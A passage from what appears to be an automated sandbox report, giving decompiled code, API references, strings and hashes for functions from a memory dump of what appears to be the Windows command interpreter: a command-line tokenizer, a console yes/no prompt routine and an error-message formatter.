									_t110 = _t110 ^ 0x00000002;
									_a4 = _t110;
								}
								if((_t110 & 0x00000023) == 0) {
									_t111 = iswspace(_t185);
									_t189 = _t189 + 4;
									if(_t111 != 0) {
										goto L61;
									} else {
										if((_a4 & 0x00000004) != 0) {
											_t112 = 0x332102;
										} else {
											_t112 = L"=,;";
										}
										_t113 = wcschr(_t112, _t185);
										_t189 = _t189 + 8;
										if(_t113 == 0) {
											goto L48;
										} else {
											goto L61;
										}
									}
								} else {
									L48:
									_t114 = iswdigit(_t185);
									_t189 = _t189 + 4;
									if(_t114 != 0) {
										_t175 =  *0x36b8a4;
										if((_t175 - 0x36388e & 0xfffffffe) < 4) {
											L70:
											_t120 =  *( *0x36b8a4) & 0x0000ffff;
											if(_t120 == 0x3e || _t120 == 0x3c) {
												_t102 = _a4;
												if((_t102 & 0x00000022) == 0) {
													goto L62;
												} else {
													goto L49;
												}
											} else {
												goto L49;
											}
										} else {
											_t121 =  *(_t175 - 4) & 0x0000ffff;
											_v20 = _t121;
											_t122 = iswspace(_t121);
											_t189 = _t189 + 4;
											if(_t122 != 0) {
												goto L70;
											} else {
												_t123 = wcschr(L"()|&=,;\"", _v20);
												_t189 = _t189 + 8;
												if(_t123 == 0) {
													goto L49;
												} else {
													goto L70;
												}
											}
										}
										goto L140;
									} else {
										L49:
										if(_t173 >= _v12 - 1) {
											L61:
											_t102 = _a4;
										} else {
											 *_t181 = _t185;
											_t181 =  &(_t181[0]);
											_t173 = _t173 + 1;
											continue;
										}
									}
								}
							}
						}
						L62:
						_a4 = _t102 & 0xffffffbf;
						 *_t181 = 0;
						_t182 = _v12;
						_t47 = _t182 - 1; // 0x3
						if(_t173 < _t47) {
							_t175 =  *0x36b8a4;
							if( *0x36b8a4 != 0x363890) {
								 *0x36b8a4 =  *0x36b8a4 - 2;
							}
						}
						if(_t173 >= _t182) {
							if(_t185 != 0xffff) {
								_t92 = E0033C5A2(_t175, 0x234f, 1, _v16);
								goto L139;
							}
						}
						return 0x4000;
						goto L140;
						L131:
						 *0x35d5b4 = 0;
						if((_a4 & 0x00000040) != 0) {
							goto L49;
						} else {
							_t185 = E0033F9D5(_t175) & 0x0000ffff;
							goto L43;
						}
						goto L140;
					}
				}
				goto L140;
			}

0x0033f300
0x0033f300
0x0033f30b
0x0033f30d
0x0033f312
0x0033f315
0x0033f318
0x0033f31d
0x0033f322
0x0034c593
0x00000000
0x0034c593
0x0033f328
0x0033f32d
0x0033f432
0x0034c4dc
0x0034c4e7
0x0034c4ec
0x0033f43d
0x0033f44a
0x0033f333
0x0033f337
0x00000000
0x00000000
0x0033f33d
0x0033f345
0x0033f34a
0x0033f350
0x0033f352
0x0033f357
0x0033f35b
0x0033f361
0x0033f366
0x00000000
0x00000000
0x00000000
0x00000000
0x0033f352
0x0033f357
0x0033f35b
0x0033f361
0x0033f364
0x0033f36d
0x0033f370
0x0033f744
0x0033f376
0x0033f376
0x0033f376
0x0033f37d
0x0033f383
0x0033f388
0x0033f6de
0x00000000
0x0033f6e4
0x00000000
0x0033f6e4
0x0033f6de
0x0033f38e
0x0033f38e
0x0033f398
0x0033f39d
0x0033f39d
0x00000000
0x0033f398
0x0033f352
0x0033f3a2
0x0033f3ae
0x0033f3b1
0x0034c4f4
0x0034c501
0x00000000
0x0034c507
0x0034c50c
0x00000000
0x0034c50c
0x00000000
0x0033f3b7
0x0033f3b7
0x0033f3b7
0x0033f3bd
0x0033f450
0x0033f48a
0x00000000
0x00000000
0x00000000
0x00000000
0x0033f452
0x0033f452
0x0033f455
0x00000000
0x0033f457
0x0033f457
0x0033f45e
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x0033f465
0x0033f46b
0x00000000
0x00000000
0x00000000
0x00000000
0x0033f46d
0x0033f470
0x0033f475
0x00000000
0x00000000
0x0033f485
0x0033f475
0x00000000
0x00000000
0x0033f7bb
0x00000000
0x0033f7c1
0x0033f7c8
0x00000000
0x0033f7ce
0x00000000
0x0033f7ce
0x0033f7c8
0x00000000
0x00000000
0x00000000
0x00000000
0x0033f45e
0x0033f455
0x0033f3c3
0x0033f3c3
0x0033f3c3
0x0033f3c6
0x0033f3c9
0x0033f3cc
0x0033f3d2
0x0033f3d2
0x0033f3d5
0x0033f3d9
0x0033f3dc
0x0033f3de
0x0033f3e4
0x0033f3e9
0x0033f76d
0x0033f770
0x0033f773
0x0033f776
0x0033f778
0x0033f778
0x0033f3f3
0x0033f681
0x0033f688
0x0033f6c6
0x0033f6c9
0x0033f6cc
0x0033f6d4
0x0033f6d7
0x0033f6d7
0x0033f68a
0x0033f691
0x0033f739
0x00000000
0x00000000
0x00000000
0x0033f697
0x0033f697
0x0033f69b
0x0033f7d8
0x0033f7db
0x0033f7de
0x0033f7de
0x0033f7e1
0x0033f7e1
0x0033f7e1
0x0033f7e6
0x0033f7ea
0x0033f7f0
0x0033f7f3
0x0033f7f9
0x0033f803
0x0033f813
0x0033f819
0x0033f81c
0x0033f81f
0x0033f822
0x0033f822
0x0033f813
0x0033f6a1
0x0033f6a1
0x0033f6ab
0x0033f6b4
0x0033f6b4
0x00000000
0x0033f6ab
0x0033f417
0x0033f417
0x0033f419
0x00000000
0x0033f41f
0x0033f3f3
0x0033f48c
0x0033f490
0x0033f868
0x00000000
0x0033f86e
0x0033f873
0x0033f879
0x00000000
0x00000000
0x0033f882
0x00000000
0x0033f888
0x0034c519
0x0034c51f
0x00000000
0x0034c525
0x00000000
0x0034c525
0x0034c51f
0x0033f882
0x00000000
0x0033f496
0x0033f496
0x0033f49a
0x0033f780
0x0033f783
0x0033f783
0x0033f4a3
0x0033f4a6
0x0033f4ac
0x0033f4b1
0x00000000
0x00000000
0x0033f4ba
0x0033f74e
0x0033f4c0
0x0033f4c0
0x0033f4c0
0x0033f4c7
0x0033f4cd
0x0033f4d2
0x00000000
0x00000000
0x0033f4d2
0x0033f4d9
0x0033f4df
0x0033f4e4
0x0033f6e9
0x0033f6ff
0x0033f720
0x0033f720
0x0033f726
0x0033f78e
0x00000000
0x0033f794
0x00000000
0x0033f794
0x0033f728
0x0033f728
0x0033f72b
0x00000000
0x00000000
0x00000000
0x0033f731
0x0033f701
0x0033f701
0x0033f706
0x0033f709
0x0033f70f
0x0033f714
0x0033f890
0x0033f89c
0x00000000
0x0033f8a2
0x00000000
0x0033f8a2
0x0033f71a
0x0033f71a
0x0033f71a
0x00000000
0x0033f71a
0x0033f714
0x00000000
0x0033f6ff
0x0033f4e4
0x0033f490
0x0033f3bd
0x0033f4ea
0x0033f4ed
0x0033f4f0
0x0033f4f3
0x0033f4f8
0x0033f505
0x0033f507
0x0033f507
0x0033f516
0x0033f519
0x00000000
0x00000000
0x0033f51f
0x0033f51f
0x0033f525
0x0033f56d
0x00000000
0x0033f56f
0x0033f56f
0x0033f576
0x00000000
0x0033f57d
0x00000000
0x00000000
0x0033f6be
0x00000000
0x00000000
0x0033f82c
0x00000000
0x00000000
0x0033f796
0x0033f796
0x0033f79b
0x00000000
0x0033f7a1
0x0033f7a3
0x0033f580
0x0033f580
0x0033f583
0x0033f586
0x0033f588
0x00000000
0x0033f58a
0x00000000
0x0033f7a9
0x0033f7ad
0x00000000
0x0033f7b3
0x00000000
0x0033f7b3
0x0033f7ad
0x0033f7a3
0x00000000
0x00000000
0x0033f758
0x0033f75d
0x00000000
0x0033f763
0x0034c552
0x00000000
0x0034c558
0x0033f82f
0x0033f82f
0x0033f833
0x00000000
0x0033f839
0x00000000
0x0033f839
0x0033f833
0x0034c552
0x00000000
0x00000000
0x00000000
0x00000000
0x0033f576
0x0033f52c
0x0033f52c
0x0033f52c
0x0033f533
0x0033f840
0x00000000
0x0033f846
0x0033f84b
0x0033f851
0x00000000
0x0033f857
0x0033f85a
0x00000000
0x0033f860
0x0034c562
0x0034c568
0x00000000
0x0034c56e
0x00000000
0x0034c56e
0x0034c568
0x0033f85a
0x0033f851
0x00000000
0x0033f539
0x0033f539
0x0033f53d
0x0033f671
0x0033f674
0x0033f674
0x0033f545
0x0033f58d
0x0033f593
0x0033f598
0x00000000
0x0033f59a
0x0033f59e
0x0033f667
0x0033f5a4
0x0033f5a4
0x0033f5a4
0x0033f5ab
0x0033f5b1
0x0033f5b6
0x00000000
0x00000000
0x00000000
0x00000000
0x0033f5b6
0x0033f547
0x0033f547
0x0033f548
0x0033f54e
0x0033f553
0x0033f5fb
0x0033f611
0x0033f641
0x0033f646
0x0033f64c
0x0033f657
0x0033f65c
0x00000000
0x0033f662
0x00000000
0x0033f662
0x00000000
0x00000000
0x00000000
0x0033f613
0x0033f613
0x0033f618
0x0033f61b
0x0033f621
0x0033f626
0x00000000
0x0033f628
0x0033f630
0x0033f636
0x0033f63b
0x00000000
0x00000000
0x00000000
0x00000000
0x0033f63b
0x0033f626
0x00000000
0x0033f559
0x0033f559
0x0033f55f
0x0033f5b8
0x0033f5b8
0x0033f561
0x0033f561
0x0033f564
0x0033f567
0x00000000
0x0033f567
0x0033f55f
0x0033f553
0x0033f545
0x0033f533
0x0033f5bb
0x0033f5be
0x0033f5c3
0x0033f5c6
0x0033f5c9
0x0033f5ce
0x0033f5d0
0x0033f5dc
0x0033f5de
0x0033f5de
0x0033f5dc
0x0033f5e7
0x0034c57b
0x0034c58b
0x00000000
0x0034c590
0x0034c57b
0x0033f5f8
0x00000000
0x0034c52a
0x0034c52e
0x0034c538
0x00000000
0x0034c53e
0x0034c543
0x00000000
0x0034c543
0x00000000
0x0034c538
0x0033f507
0x00000000

APIs

_setjmp3.MSVCRT ref: 0033F318
iswspace.MSVCRT ref: 0033F35B
wcschr.MSVCRT ref: 0033F37D
iswdigit.MSVCRT ref: 0033F3DE
iswspace.MSVCRT ref: 0033F4A6
wcschr.MSVCRT ref: 0033F4C7
iswdigit.MSVCRT ref: 0033F4D9
iswdigit.MSVCRT ref: 0033F548
iswspace.MSVCRT ref: 0033F58D
wcschr.MSVCRT ref: 0033F5AB
iswspace.MSVCRT ref: 0033F61B
wcschr.MSVCRT ref: 0033F630
iswspace.MSVCRT ref: 0033F709

Strings

Ungetting: '%s', xrefs: 0034C4E2
()|&=,;", xrefs: 0033F62B, 0033F890
=,;, xrefs: 0033F376, 0033F37C, 0033F4C0, 0033F4C6, 0033F5A4, 0033F5AA, 0033F7F9

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: iswspace$wcschr$iswdigit$_setjmp3
String ID: ()|&=,;"$=,;$Ungetting: '%s'
API String ID: 1805751789-2755026540
Opcode ID: a95d1f820f2b3654df3c7ddd8bd0ad6546623f14dbb1fa9caf5e5da451a4fd56
Instruction ID: 7376877ebaff34bbe9a7021eeb9958f378808e20db8e215d8a3d8b5804407176
Opcode Fuzzy Hash: a95d1f820f2b3654df3c7ddd8bd0ad6546623f14dbb1fa9caf5e5da451a4fd56
Instruction Fuzzy Hash: BFE12175E002019EEF338F2A99C937A77A8AF16355FE94032F845DB2A1D374CD809752

Uniqueness

Uniqueness Score: -1.00%

Function 00359583, Relevance: 30.0, APIs: 15, Strings: 2, Instructions: 247
COMMON

Download Yara Rule

C-Code - Quality: 59%

			E00359583(void* __ecx, intOrPtr __edx, char _a4) {
				signed int _v12;
				long _v44;
				char _v45;
				char _v46;
				long _v52;
				long _v56;
				long _v60;
				long _v64;
				intOrPtr _v68;
				void* _v72;
				char _v76;
				intOrPtr _v80;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t51;
				intOrPtr _t58;
				void* _t69;
				signed int _t74;
				void* _t81;
				signed int _t93;
				void _t94;
				signed int _t98;
				char _t100;
				void* _t101;
				signed int* _t105;
				intOrPtr* _t106;
				void* _t114;
				void* _t120;
				void* _t122;
				void* _t124;
				void* _t125;
				intOrPtr _t126;
				void* _t127;
				long _t128;
				void* _t130;
				wchar_t* _t131;
				long _t134;
				signed int _t135;
				void* _t136;
				void* _t137;
				void* _t138;

				_t104 = __ecx;
				_t51 =  *0x35d0b4; // 0xd59bd0e8
				_v12 = _t51 ^ _t135;
				_t100 = _a4;
				_t128 = 0;
				_v68 = __edx;
				_v72 = __ecx;
				_v56 = 0;
				_v45 = 0;
				_v46 = 0;
				if(__edx != 0x400023d3) {
					L5:
					_push(_t100);
					_t124 = E0033B3FC(_t104);
					_t137 = _t136 + 4;
					if(_t124 == 0) {
						L10:
						_t105 =  &_v44;
						_t120 = 0x10;
						_t130 = L"NY" - _t105;
						while(1) {
							_t12 = _t120 + 0x7fffffee; // 0x7ffffffe
							if(_t12 == 0) {
								break;
							}
							_t93 =  *(_t130 + _t105) & 0x0000ffff;
							if(_t93 == 0) {
								break;
							}
							 *_t105 = _t93;
							_t105 =  &(_t105[0]);
							_t120 = _t120 - 1;
							if(_t120 != 0) {
								continue;
							}
							L16:
							_t105 = _t105 - 2;
							L17:
							_t128 = 0;
							 *_t105 = 0;
							L18:
							_t106 =  &_v44;
							_t121 = _t106 + 2;
							do {
								_t58 =  *_t106;
								_t106 = _t106 + 2;
							} while (_t58 != 0);
							_t108 = _t106 - _t121 >> 1;
							_v80 = (_t106 - _t121 >> 1) - 1;
							LocalFree(_t124);
							_t101 = GetStdHandle(0xfffffff5);
							_v88 = _t101;
							if(GetConsoleMode(_t101,  &_v60) != 0) {
								_t108 = _v60 | 0x00000001;
								_v45 = 1;
								SetConsoleMode(_t101, _v60 | 0x00000001);
							}
							_t125 = GetStdHandle(0xfffffff6);
							_v84 = _t125;
							if(GetConsoleMode(_t125,  &_v64) != 0) {
								_t108 = _v64 | 0x00000007;
								SetConsoleMode(_t125, _v64 | 0x00000007);
								_t134 =  *0x363888;
								if(_t134 != 0) {
									_t108 = _t134;
									 *0x3794b4(L"<noalias>");
									 *_t134();
								}
								_t128 = 0;
							}
							_t126 = _v68;
							while(1) {
								_t100 = 1;
								_v52 = 0;
								_t68 = _v72;
								if(_v72 == 0) {
									_push(0);
									_push(_t126);
									_t69 = E0033C108(_t108);
									_t138 = _t137 + 8;
								} else {
									_t69 = E0033C108(_t108, _t126, 1, _t68);
									_t138 = _t137 + 0xc;
								}
								_t108 = 0;
								if(E00340178(_t69) != 0) {
									FlushConsoleInputBuffer(GetStdHandle(0xfffffff6));
								}
								if(_v52 == 0xa) {
									goto L45;
								} else {
									goto L35;
								}
								while(1) {
									L35:
									_t81 = GetStdHandle(0xfffffff6);
									_t121 =  &_v52;
									_t108 = _t81;
									if(E00353B11(_t81,  &_v52, 1,  &_v76) == 0 || _v76 != 1) {
										break;
									}
									if(_t100 != 0) {
										_t128 = towupper(_v52) & 0x0000ffff;
										_t138 = _t138 + 4;
										_v56 = _t128;
									}
									_t108 = 0;
									_t100 = 0;
									if(E00340178(_t82) == 0 || ( *0x373aa0 & 0x00000001) == 0) {
										_push(_v52 & 0x0000ffff);
										E003425D9(L"%c");
										_t138 = _t138 + 8;
									}
									if(_v52 != 0xa) {
										continue;
									} else {
										goto L45;
									}
								}
								_t128 = _v44 & 0x0000ffff;
								_v56 = _t128;
								E003425D9(L"\r\n");
								_t138 = _t138 + 4;
								L45:
								_t131 = wcschr( &_v44, _t128);
								_t137 = _t138 + 8;
								if(_t131 == 0) {
									L28:
									_t128 = _v56;
									continue;
								}
								_t133 = _t131 -  &_v44 >> 1;
								if(_t133 > _v80) {
									goto L28;
								}
								_t127 = _v84;
								if(_v45 != 0) {
									SetConsoleMode(_v88, _v60);
								}
								if(_t100 != 0) {
									SetConsoleMode(_t127, _v64);
									_t127 =  *0x363888;
									if(_t127 != 0) {
										 *0x3794b4(L"CMD.EXE");
										 *_t127();
									}
								}
								_t74 = _t133;
								L53:
								return E00346FD0(_t74, _t100, _v12 ^ _t135, _t121, _t127, _t133);
							}
						}
						if(_t120 != 0) {
							goto L17;
						}
						goto L16;
					}
					_t114 = _t124;
					_t8 = _t114 + 2; // 0x2
					_t122 = _t8;
					do {
						_t94 =  *_t114;
						_t114 = _t114 + 2;
					} while (_t94 != 0);
					if(_t114 - _t122 >> 1 >= 0x10) {
						goto L10;
					}
					E00341040( &_v44, 0x10, _t124);
					__imp___wcsupr( &_v44);
					_t137 = _t137 + 4;
					goto L18;
				}
				_t136 = _t136 - 8;
				_t121 = 0;
				_t127 = E00335DB5(__ecx, 0);
				if(_t127 == 0xffffffff) {
					goto L5;
				}
				_t98 = E00340178(_t97);
				_t104 = _t127;
				_t133 = _t98;
				E0033DB92(_t127);
				if(_t98 == 0) {
					_t128 = 0;
					goto L5;
				}
				_t74 = 2;
				goto L53;
			}

0x00359583
0x0035958b
0x00359592
0x00359596
0x0035959c
0x0035959e
0x003595a1
0x003595a4
0x003595a7
0x003595ab
0x003595b6
0x003595e9
0x003595e9
0x003595ef
0x003595f1
0x003595f6
0x00359634
0x00359634
0x0035963e
0x00359643
0x00359645
0x00359645
0x0035964d
0x00000000
0x00000000
0x0035964f
0x00359656
0x00000000
0x00000000
0x00359658
0x0035965b
0x0035965e
0x00359661
0x00000000
0x00000000
0x00359669
0x00359669
0x0035966c
0x0035966e
0x00359670
0x00359673
0x00359673
0x00359676
0x00359679
0x00359679
0x0035967c
0x0035967f
0x00359686
0x0035968c
0x0035968f
0x0035969d
0x003596a4
0x003596af
0x003596b4
0x003596b7
0x003596bd
0x003596bd
0x003596cb
0x003596d2
0x003596dd
0x003596e4
0x003596e9
0x003596ef
0x003596f7
0x003596fe
0x00359700
0x00359706
0x00359706
0x00359708
0x00359708
0x0035970f
0x00359717
0x00359719
0x0035971b
0x0035971f
0x00359724
0x00359734
0x00359736
0x00359737
0x0035973c
0x00359726
0x0035972a
0x0035972f
0x0035972f
0x0035973f
0x00359748
0x00359753
0x00359753
0x0035975e
0x00000000
0x00000000
0x00000000
0x00000000
0x00359764
0x00359764
0x0035976c
0x00359772
0x00359775
0x0035977e
0x00000000
0x00000000
0x00359788
0x00359793
0x00359796
0x00359799
0x00359799
0x0035979c
0x0035979e
0x003597a7
0x003597b6
0x003597bc
0x003597c1
0x003597c1
0x003597c9
0x00000000
0x003597cb
0x00000000
0x003597cb
0x003597c9
0x003597cd
0x003597d6
0x003597d9
0x003597de
0x003597e1
0x003597ec
0x003597ee
0x003597f3
0x00359714
0x00359714
0x00000000
0x00359714
0x003597fe
0x00359803
0x00000000
0x00000000
0x0035980d
0x00359810
0x00359818
0x00359818
0x00359820
0x00359826
0x0035982c
0x00359834
0x0035983d
0x00359843
0x00359843
0x00359834
0x00359845
0x00359847
0x00359857
0x00359857
0x00359717
0x00359667
0x00000000
0x00000000
0x00000000
0x00359667
0x003595f8
0x003595fa
0x003595fa
0x00359603
0x00359603
0x00359606
0x00359609
0x00359615
0x00000000
0x00000000
0x00359620
0x00359629
0x0035962f
0x00000000
0x0035962f
0x003595b8
0x003595bb
0x003595c2
0x003595c7
0x00000000
0x00000000
0x003595cb
0x003595d0
0x003595d2
0x003595d4
0x003595db
0x003595e7
0x00000000
0x003595e7
0x003595dd
0x00000000

APIs

_wcsupr.MSVCRT ref: 00359629
LocalFree.API-MS-WIN-CORE-HEAP-L2-1-0(00000000), ref: 0035968F
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F5), ref: 00359697
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 003596A7
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 003596BD
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 003596C5
GetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 003596D5
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(00000000,?), ref: 003596E9
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6), ref: 0035974C
FlushConsoleInputBuffer.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000), ref: 00359753
GetStdHandle.API-MS-WIN-CORE-PROCESSENVIRONMENT-L1-1-0(000000F6,00000001,?), ref: 0035976C
towupper.MSVCRT ref: 0035978D
wcschr.MSVCRT ref: 003597E6
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00359818
SetConsoleMode.API-MS-WIN-CORE-CONSOLE-L1-1-0(?,?), ref: 00359826

Part of subcall function 00340178: _get_osfhandle.MSVCRT ref: 00340183
Part of subcall function 00340178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,0034D6A1), ref: 0034018D

Part of subcall function 0033DB92: _close.MSVCRT ref: 0033DBC1

Strings

CMD.EXE, xrefs: 00359836
<noalias>, xrefs: 003596F9

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: Console$Mode$Handle$BufferFileFlushFreeInputLocalType_close_get_osfhandle_wcsuprtowupperwcschr
String ID: <noalias>$CMD.EXE
API String ID: 2015057810-1690691951
Opcode ID: d6cf2db808dc5eb28e41250902546d450c882d289f86e648c7a075409858df3b
Instruction ID: ccb0fee86a592bdce59f6bb1bb936586ce203d2f773865029f79db71317c576b
Opcode Fuzzy Hash: d6cf2db808dc5eb28e41250902546d450c882d289f86e648c7a075409858df3b
Instruction Fuzzy Hash: A281D531910214DBCB269FA4DC45FEEB7B9AF49711F19021BFC06A72A0EB749949C790

Uniqueness

Uniqueness Score: -1.00%

Function 00351C79, Relevance: 26.4, APIs: 2, Strings: 13, Instructions: 166
windowthreadCOMMON

Download Yara Rule

C-Code - Quality: 23%

			E00351C79(signed short* __ecx, signed int __edx, intOrPtr* _a4) {
				signed int _v8;
				short _v520;
				char* _v524;
				signed int _v528;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t39;
				intOrPtr _t45;
				signed short* _t50;
				void* _t53;
				void* _t54;
				signed short* _t58;
				void* _t59;
				void* _t60;
				signed short* _t65;
				void* _t74;
				intOrPtr* _t75;
				void* _t76;
				intOrPtr* _t77;
				signed int _t78;
				void* _t79;
				void* _t80;
				void* _t81;
				void* _t82;

				_t73 = __edx;
				_t39 =  *0x35d0b4; // 0xd59bd0e8
				_v8 = _t39 ^ _t78;
				_t65 = __ecx;
				_v528 = __edx;
				_t77 = _a4;
				if(__edx == 0 || __ecx == 0) {
					L31:
					return E00346FD0(0, _t65, _v8 ^ _t78, _t73, _t74, _t77);
				} else {
					_push(_t74);
					_t75 =  *0x37807c;
					 *__ecx = 0;
					if(_t75 == 0 ||  *0x378081 == 0) {
						L5:
						_v524 = 0x3330d8;
						_t45 =  *_t77;
						if(_t45 == 0) {
							_v524 = "Exception";
						} else {
							_t59 = _t45 - 1;
							if(_t59 == 0) {
								_v524 = "ReturnHr";
							} else {
								_t60 = _t59 - 1;
								if(_t60 == 0) {
									_v524 = "LogHr";
								} else {
									if(_t60 == 1) {
										_v524 = "FailFast";
									}
								}
							}
						}
						_v520 = 0;
						FormatMessageW(0x1200, 0,  *(_t77 + 4), 0x400,  &_v520, 0x100, 0);
						_push( *((intOrPtr*)(_t77 + 0x48)));
						_push( *((intOrPtr*)(_t77 + 0x44)));
						_t76 = _t65 + _v528 * 2;
						if( *((intOrPtr*)(_t77 + 0x1c)) == 0) {
							_push(L"%hs!%p: ");
							_push(_t76);
							_push(_t65);
							_t50 = E003524CB();
							_t80 = _t79 + 0x14;
						} else {
							_push( *((intOrPtr*)(_t77 + 0x20)));
							_t50 = E003524CB(_t65, _t76, L"%hs(%d)\\%hs!%p: ",  *((intOrPtr*)(_t77 + 0x1c)));
							_t80 = _t79 + 0x1c;
						}
						_t65 = _t50;
						if( *((intOrPtr*)(_t77 + 0x4c)) != 0) {
							_t58 = E003524CB(_t65, _t76, L"(caller: %p) ",  *((intOrPtr*)(_t77 + 0x4c)));
							_t80 = _t80 + 0x10;
							_t65 = _t58;
						}
						_push( &_v520);
						_push( *(_t77 + 4));
						_push(GetCurrentThreadId());
						_push( *((intOrPtr*)(_t77 + 0x24)));
						_t53 = E003524CB(_t65, _t76, L"%hs(%d) tid(%x) %08X %ws", _v524);
						_t81 = _t80 + 0x20;
						if( *((intOrPtr*)(_t77 + 0xc)) != 0 ||  *((intOrPtr*)(_t77 + 0x28)) != 0 ||  *((intOrPtr*)(_t77 + 0x18)) != 0) {
							_push(L"    ");
							_push(_t76);
							_push(_t53);
							_t54 = E003524CB();
							_t82 = _t81 + 0xc;
							if( *((intOrPtr*)(_t77 + 0xc)) != 0) {
								_t54 = E003524CB(_t54, _t76, L"Msg:[%ws] ",  *((intOrPtr*)(_t77 + 0xc)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x28)) != 0) {
								_t54 = E003524CB(_t54, _t76, L"CallContext:[%hs] ",  *((intOrPtr*)(_t77 + 0x28)));
								_t82 = _t82 + 0x10;
							}
							if( *((intOrPtr*)(_t77 + 0x14)) == 0) {
								if( *((intOrPtr*)(_t77 + 0x18)) == 0) {
									_push("\n");
									_push(_t76);
									_push(_t54);
									E003524CB();
								} else {
									E003524CB(_t54, _t76, L"[%hs]\n",  *((intOrPtr*)(_t77 + 0x18)));
								}
							} else {
								_push( *((intOrPtr*)(_t77 + 0x14)));
								E003524CB(_t54, _t76, L"[%hs(%hs)]\n",  *((intOrPtr*)(_t77 + 0x18)));
							}
						}
						goto L30;
					} else {
						 *0x3794b4(_t77, __ecx, __edx);
						 *_t75();
						if(( *__ecx & 0x0000ffff) != 0) {
							L30:
							_pop(_t74);
							goto L31;
						}
						goto L5;
					}
				}
			}

0x00351c79
0x00351c84
0x00351c8b
0x00351c91
0x00351c93
0x00351c9a
0x00351c9f
0x00351e72
0x00351e83
0x00351cad
0x00351cad
0x00351cae
0x00351cb6
0x00351cbb
0x00351cde
0x00351ce2
0x00351cec
0x00351cee
0x00351d23
0x00351cf0
0x00351cf0
0x00351cf3
0x00351d17
0x00351cf5
0x00351cf5
0x00351cf8
0x00351d0b
0x00351cfa
0x00351cfd
0x00351cff
0x00351cff
0x00351cfd
0x00351cf8
0x00351cf3
0x00351d35
0x00351d51
0x00351d61
0x00351d64
0x00351d67
0x00351d6a
0x00351d83
0x00351d88
0x00351d89
0x00351d8a
0x00351d8f
0x00351d6c
0x00351d6c
0x00351d79
0x00351d7e
0x00351d7e
0x00351d96
0x00351d98
0x00351da4
0x00351da9
0x00351dac
0x00351dac
0x00351db4
0x00351db5
0x00351dbe
0x00351dbf
0x00351dcf
0x00351dd6
0x00351ddc
0x00351dec
0x00351df1
0x00351df2
0x00351df3
0x00351df8
0x00351dff
0x00351e0b
0x00351e10
0x00351e10
0x00351e17
0x00351e23
0x00351e28
0x00351e28
0x00351e2f
0x00351e4c
0x00351e62
0x00351e67
0x00351e68
0x00351e69
0x00351e4e
0x00351e58
0x00351e5d
0x00351e31
0x00351e31
0x00351e3e
0x00351e43
0x00351e2f
0x00000000
0x00351cc5
0x00351cca
0x00351cd0
0x00351cd8
0x00351e71
0x00351e71
0x00000000
0x00351e71
0x00000000
0x00351cd8
0x00351cbb

APIs

FormatMessageW.API-MS-WIN-CORE-LOCALIZATION-L1-2-0(00001200,00000000,?,00000400,?,00000100,00000000,?,?,00000000), ref: 00351D51
GetCurrentThreadId.API-MS-WIN-CORE-PROCESSTHREADS-L1-1-0(?,?), ref: 00351DB8

Strings

[%hs], xrefs: 00351E51
Exception, xrefs: 00351D23
Msg:[%ws] , xrefs: 00351E04
%hs(%d)\%hs!%p: , xrefs: 00351D72
ReturnHr, xrefs: 00351D17
%hs!%p: , xrefs: 00351D83
(caller: %p) , xrefs: 00351D9D
LogHr, xrefs: 00351D0B
%hs(%d) tid(%x) %08X %ws, xrefs: 00351DC8
FailFast, xrefs: 00351CFF
CallContext:[%hs] , xrefs: 00351E1C
, xrefs: 00351DEC
[%hs(%hs)], xrefs: 00351E37

Memory Dump Source

Source File: 0000001A.00000002.467560189.0000000000330000.00000040.00000001.sdmp, Offset: 00330000, based on PE: true

Associated: 0000001A.00000002.468665069.0000000000379000.00000040.00000001.sdmp Download File
Associated: 0000001A.00000002.468797072.000000000037D000.00000040.00000001.sdmp Download File

Similarity

API ID: CurrentFormatMessageThread
String ID: $%hs!%p: $%hs(%d) tid(%x) %08X %ws$%hs(%d)\%hs!%p: $(caller: %p) $CallContext:[%hs] $Exception$FailFast$LogHr$Msg:[%ws] $ReturnHr$[%hs(%hs)]$[%hs]
API String ID: 2411632146-2849347638
Opcode ID: fab32704ed89219ba809acf2850115c003bcfbd9851ca663678ef7f4dfd9c301
Instruction ID: 55c1f887eb9aadf93c139ec3675645a70e1e4c30534206da02ad5c4ae9d5c196
Opcode Fuzzy Hash: fab32704ed89219ba809acf2850115c003bcfbd9851ca663678ef7f4dfd9c301
Instruction Fuzzy Hash: A15115B1900304ABDB33AB668C4AFB7B7F8EB45302F00455DFD1A92171D6719A88CB61

Uniqueness

Uniqueness Score: -1.00%

Function 0033E560, Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 306
COMMON

Download Yara Rule

C-Code - Quality: 72%

			E0033E560(struct HINSTANCE__** __ecx, struct HINSTANCE__* __edx) {
				signed int _v8;
				char _v24;
				int _v28;
				void* _v32;
				intOrPtr _v36;
				void* _v40;
				void* _v48;
				struct HINSTANCE__* _v552;
				struct HINSTANCE__* _v556;
				struct HINSTANCE__* _v560;
				struct HINSTANCE__* _v564;
				struct HINSTANCE__* _v568;
				intOrPtr _v572;
